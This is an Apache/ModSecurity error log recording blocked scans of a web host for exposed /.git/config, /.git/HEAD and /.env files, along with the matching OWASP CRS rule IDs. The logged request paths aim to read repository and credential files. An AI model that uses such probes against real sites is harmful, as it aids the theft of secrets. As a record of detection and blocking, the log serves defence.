[Thu Dec 14 05:32:12.632570 2023] [:error] [pid 3850044] [client 110.138.91.210:59802] [client 110.138.91.210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZXqFTHWrjpmkREXPefbvPwAAAAQ"]
[Thu Dec 14 05:32:12.632768 2023] [:error] [pid 3850044] [client 110.138.91.210:59802] [client 110.138.91.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZXqFTHWrjpmkREXPefbvPwAAAAQ"]
[Thu Dec 14 05:32:12.632906 2023] [:error] [pid 3850044] [client 110.138.91.210:59802] [client 110.138.91.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZXqFTHWrjpmkREXPefbvPwAAAAQ"]
[Tue Dec 19 21:11:29.936992 2023] [:error] [pid 3960695] [client 94.156.64.127:52705] [client 94.156.64.127] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZYH48S45mAMxAWJf1gok3AAAAAU"]
[Tue Dec 19 21:11:29.943804 2023] [:error] [pid 3960695] [client 94.156.64.127:52705] [client 94.156.64.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZYH48S45mAMxAWJf1gok3AAAAAU"]
[Tue Dec 19 21:11:29.943987 2023] [:error] [pid 3960695] [client 94.156.64.127:52705] [client 94.156.64.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZYH48S45mAMxAWJf1gok3AAAAAU"]
[Tue Dec 19 21:11:37.109231 2023] [:error] [pid 3960694] [client 65.154.226.168:41720] [client 65.154.226.168] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZYH4-TpDAk_hmXW3_W4uRgAAAAQ"], referer: http://economiasolidale.38121.it/.env
[Tue Dec 19 21:11:37.109450 2023] [:error] [pid 3960694] [client 65.154.226.168:41720] [client 65.154.226.168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZYH4-TpDAk_hmXW3_W4uRgAAAAQ"], referer: http://economiasolidale.38121.it/.env
[Tue Dec 19 21:11:37.109599 2023] [:error] [pid 3960694] [client 65.154.226.168:41720] [client 65.154.226.168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZYH4-TpDAk_hmXW3_W4uRgAAAAQ"], referer: http://economiasolidale.38121.it/.env
[Fri Jan 05 22:59:57.925458 2024] [:error] [pid 147513] [client 31.220.0.86:44032] [client 31.220.0.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZZh73WVK2WvyFqkqF8dBnwAAAAo"]
[Fri Jan 05 22:59:57.930554 2024] [:error] [pid 147513] [client 31.220.0.86:44032] [client 31.220.0.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZZh73WVK2WvyFqkqF8dBnwAAAAo"]
[Fri Jan 05 22:59:57.930779 2024] [:error] [pid 147513] [client 31.220.0.86:44032] [client 31.220.0.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZZh73WVK2WvyFqkqF8dBnwAAAAo"]
[Sun Jan 07 02:41:37.170139 2024] [:error] [pid 183107] [client 54.186.174.90:60808] [client 54.186.174.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /settings/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/settings/.git/config"] [unique_id "ZZoBUUDpqXVsg6FObslUpwAAAAE"]
[Sun Jan 07 02:41:37.170429 2024] [:error] [pid 183107] [client 54.186.174.90:60808] [client 54.186.174.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/settings/.git/config"] [unique_id "ZZoBUUDpqXVsg6FObslUpwAAAAE"]
[Sun Jan 07 02:41:37.170599 2024] [:error] [pid 183107] [client 54.186.174.90:60808] [client 54.186.174.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/settings/.git/config"] [unique_id "ZZoBUUDpqXVsg6FObslUpwAAAAE"]
[Sun Jan 07 04:26:46.564677 2024] [:error] [pid 186844] [client 54.186.174.90:53592] [client 54.186.174.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /log/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/log/.git/config"] [unique_id "ZZoZ9mO1muzcw0eX6tU7RAAAAAY"]
[Sun Jan 07 04:26:46.565806 2024] [:error] [pid 186844] [client 54.186.174.90:53592] [client 54.186.174.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/log/.git/config"] [unique_id "ZZoZ9mO1muzcw0eX6tU7RAAAAAY"]
[Sun Jan 07 04:26:46.566008 2024] [:error] [pid 186844] [client 54.186.174.90:53592] [client 54.186.174.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/log/.git/config"] [unique_id "ZZoZ9mO1muzcw0eX6tU7RAAAAAY"]
[Sun Jan 07 04:27:46.824291 2024] [:error] [pid 185562] [client 54.186.174.90:41272] [client 54.186.174.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /uploads/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "ZZoaMvmvdLq-qiYO1B59EgAAAAM"]
[Sun Jan 07 04:27:46.824548 2024] [:error] [pid 185562] [client 54.186.174.90:41272] [client 54.186.174.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "ZZoaMvmvdLq-qiYO1B59EgAAAAM"]
[Sun Jan 07 04:27:46.824727 2024] [:error] [pid 185562] [client 54.186.174.90:41272] [client 54.186.174.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "ZZoaMvmvdLq-qiYO1B59EgAAAAM"]
[Sun Jan 07 04:39:20.191488 2024] [:error] [pid 186848] [client 54.186.174.90:34464] [client 54.186.174.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /files/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "ZZoc6JoMqswmgfExSGUTTAAAAAo"]
[Sun Jan 07 04:39:20.191845 2024] [:error] [pid 186848] [client 54.186.174.90:34464] [client 54.186.174.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "ZZoc6JoMqswmgfExSGUTTAAAAAo"]
[Sun Jan 07 04:39:20.192098 2024] [:error] [pid 186848] [client 54.186.174.90:34464] [client 54.186.174.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "ZZoc6JoMqswmgfExSGUTTAAAAAo"]
[Sun Jan 07 06:10:56.173329 2024] [:error] [pid 186844] [client 54.186.174.90:32794] [client 54.186.174.90] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /doc/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/doc/.git/config"] [unique_id "ZZoyYGO1muzcw0eX6tU7ZAAAAAY"]
[Sun Jan 07 06:10:56.173674 2024] [:error] [pid 186844] [client 54.186.174.90:32794] [client 54.186.174.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/doc/.git/config"] [unique_id "ZZoyYGO1muzcw0eX6tU7ZAAAAAY"]
[Sun Jan 07 06:10:56.173861 2024] [:error] [pid 186844] [client 54.186.174.90:32794] [client 54.186.174.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/doc/.git/config"] [unique_id "ZZoyYGO1muzcw0eX6tU7ZAAAAAY"]
[Sun Jan 07 13:04:47.584974 2024] [:error] [pid 190696] [client 54.185.142.136:53914] [client 54.185.142.136] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /src/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "ZZqTX3uzg6-qfRC3DD2JwAAAAAA"]
[Sun Jan 07 13:04:47.585282 2024] [:error] [pid 190696] [client 54.185.142.136:53914] [client 54.185.142.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "ZZqTX3uzg6-qfRC3DD2JwAAAAAA"]
[Sun Jan 07 13:04:47.585454 2024] [:error] [pid 190696] [client 54.185.142.136:53914] [client 54.185.142.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "ZZqTX3uzg6-qfRC3DD2JwAAAAAA"]
[Sun Jan 07 13:23:24.483420 2024] [:error] [pid 185564] [client 54.185.142.136:43168] [client 54.185.142.136] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /uploads/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "ZZqXvGcNqQlbucWTKEF8IQAAAAU"]
[Sun Jan 07 13:23:24.483892 2024] [:error] [pid 185564] [client 54.185.142.136:43168] [client 54.185.142.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "ZZqXvGcNqQlbucWTKEF8IQAAAAU"]
[Sun Jan 07 13:23:24.484119 2024] [:error] [pid 185564] [client 54.185.142.136:43168] [client 54.185.142.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "ZZqXvGcNqQlbucWTKEF8IQAAAAU"]
[Sun Jan 07 15:14:01.350935 2024] [authz_core:error] [pid 193161] [client 54.185.142.136:33956] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Tue Jan 09 19:59:54.266842 2024] [authz_core:error] [pid 241206] [client 18.139.162.192:60014] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Wed Jan 10 01:18:51.922851 2024] [:error] [pid 251296] [client 18.139.162.192:39390] [client 18.139.162.192] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /core/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZZ3iazeD73lP8P_t-GTj7AAAAAM"]
[Wed Jan 10 01:18:51.923342 2024] [:error] [pid 251296] [client 18.139.162.192:39390] [client 18.139.162.192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZZ3iazeD73lP8P_t-GTj7AAAAAM"]
[Wed Jan 10 01:18:51.923636 2024] [:error] [pid 251296] [client 18.139.162.192:39390] [client 18.139.162.192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "ZZ3iazeD73lP8P_t-GTj7AAAAAM"]
[Wed Jan 10 04:08:44.036197 2024] [:error] [pid 253702] [client 18.139.162.192:55244] [client 18.139.162.192] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZZ4KPO8g_EQ9ZCDn3z7o6gAAAAQ"]
[Wed Jan 10 04:08:44.036461 2024] [:error] [pid 253702] [client 18.139.162.192:55244] [client 18.139.162.192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZZ4KPO8g_EQ9ZCDn3z7o6gAAAAQ"]
[Wed Jan 10 04:08:44.036641 2024] [:error] [pid 253702] [client 18.139.162.192:55244] [client 18.139.162.192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZZ4KPO8g_EQ9ZCDn3z7o6gAAAAQ"]
[Tue Jan 16 09:46:37.511749 2024] [authz_core:error] [pid 387093] [client 54.81.152.73:59216] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
